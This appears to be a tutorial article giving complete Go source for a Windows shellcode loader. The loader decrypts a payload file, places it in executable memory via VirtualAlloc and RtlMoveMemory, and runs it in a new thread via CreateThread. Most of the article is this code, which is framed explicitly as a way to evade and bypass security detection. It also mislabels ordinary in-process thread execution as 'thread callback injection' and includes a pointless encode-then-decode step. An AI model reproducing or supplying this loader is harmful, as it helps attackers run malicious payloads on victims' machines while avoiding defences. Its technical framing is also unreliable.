Advanced Shellcode Injection with Thread Callback Injection in Go

This article will delve into an advanced technique for Shellcode injection in Go, specifically utilizing thread callback injection for increased stealth and resilience. Unlike the basic approach of loading and executing Shellcode directly using syscall.Syscall(), this method leverages the power of thread creation, making it more challenging to detect and stop.

In the previous example, we utilized a simple approach of loading the decoded Shellcode into memory and executing it using syscall.Syscall(). While effective, this method can be easily identified and blocked by security measures. To enhance the process, we'll implement thread callback injection. This involves creating a new thread and executing the Shellcode within that thread, effectively masking its presence within the primary thread.

Let's modify the exec() function to achieve this. We'll incorporate the CreateThread() function from the kernel32.dll library. This function enables us to create a new thread and specify the entry point where our Shellcode should be executed.

package main

import (
	"crypto/aes"
	"crypto/cipher"
	"encoding/base64"
	"io/ioutil"
	"syscall"
	"time"
	"unsafe"
)

const (
	MEM_COMMIT             = 0x1000
	MEM_RESERVE            = 0x2000
	PAGE_EXECUTE_READWRITE = 0x40
)

var AesKey = []byte{
	0x13, 0x54, 077, 0x1A, 0xA1, 0x3F, 0x04, 0x8B,
	0x13, 0x54, 0x77, 0x69, 0x97, 0x3F, 0x33, 0x2B,
	0x31, 0x23, 0x37, 0x19, 0x91, 0x3F, 0x50, 0x9B,
}

type CipherFunc func(key []byte, src []byte) []byte

func AesCipher(key []byte, src []byte) []byte {
	block, _ := aes.NewCipher(key)
	iv := make([]byte, aes.BlockSize)
	stream := cipher.NewCTR(block, iv)
	dst := make([]byte, len(src))
	stream.XORKeyStream(dst, src)
	return dst
}

func Crypt(cipher CipherFunc, key []byte, src []byte) []byte {
	return cipher(key, src)
}

func Encode(src string) string {
	payloadBytes := []byte(src)
	encodedBytes := Crypt(AesCipher, AesKey, payloadBytes)
	bdata := base64.StdEncoding.EncodeToString(encodedBytes)
	return bdata
}

func Decode(src string) []byte {
	decodedBytes, _ := base64.StdEncoding.DecodeString(src)
	payloadBytes := Crypt(AesCipher, AesKey, decodedBytes)
	return payloadBytes
}

var (
	kernel32      = syscall.NewLazyDLL("kernel32.dll")
	ntdll         = syscall.NewLazyDLL("ntdll.dll")
	VirtualAlloc  = kernel32.NewProc("VirtualAlloc")
	RtlMoveMemory = ntdll.NewProc("RtlMoveMemory")
	CreateThread  = kernel32.NewProc("CreateThread")
)

func exec(charcode []byte) {
	addr, _, _ := VirtualAlloc.Call(0, uintptr(len(charcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
	time.Sleep(5)
	_, _, _ = RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&charcode[0])), uintptr(len(charcode)))
	time.Sleep(5)
	handle, _, _ := CreateThread.Call(0, 0, addr, 0, 0, 0)
	time.Sleep(5)
	syscall.WaitForSingleObject(syscall.Handle(handle), syscall.INFINITE)
}

func readFile(filename string) []byte {
	data, _ := ioutil.ReadFile(filename)
	return data
}

func main() {
	payload := string(readFile("./payload.bin"))
	encodedPayload := Encode(payload)
	shellCodeHex := Decode(encodedPayload)
	exec(shellCodeHex)
}

The modified exec() function now utilizes CreateThread() to create a new thread. We provide the Shellcode's memory address (addr) as the thread's entry point. This effectively shifts the execution of the Shellcode to a separate thread, making it more difficult for conventional security mechanisms to identify and stop it.

In essence, by leveraging thread callback injection, we increase the sophistication of our Shellcode injection technique. This approach not only enhances the stealthiness of the process but also creates a greater challenge for security systems seeking to detect and prevent malicious activity. The Shellcode's execution is now concealed within a new thread, effectively bypassing traditional detection methods.